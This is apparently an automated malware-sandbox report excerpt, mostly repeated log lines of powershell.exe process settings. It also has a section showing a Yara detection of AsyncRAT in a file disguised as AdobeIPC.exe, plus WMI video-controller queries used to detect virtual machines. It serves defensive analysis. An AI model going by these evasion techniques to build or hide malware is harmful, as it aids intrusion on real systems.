Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: AdobeIPC.exe PID: 7364, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Memory allocated: C10000 memory reserve \| memory write watch	Jump to behavior
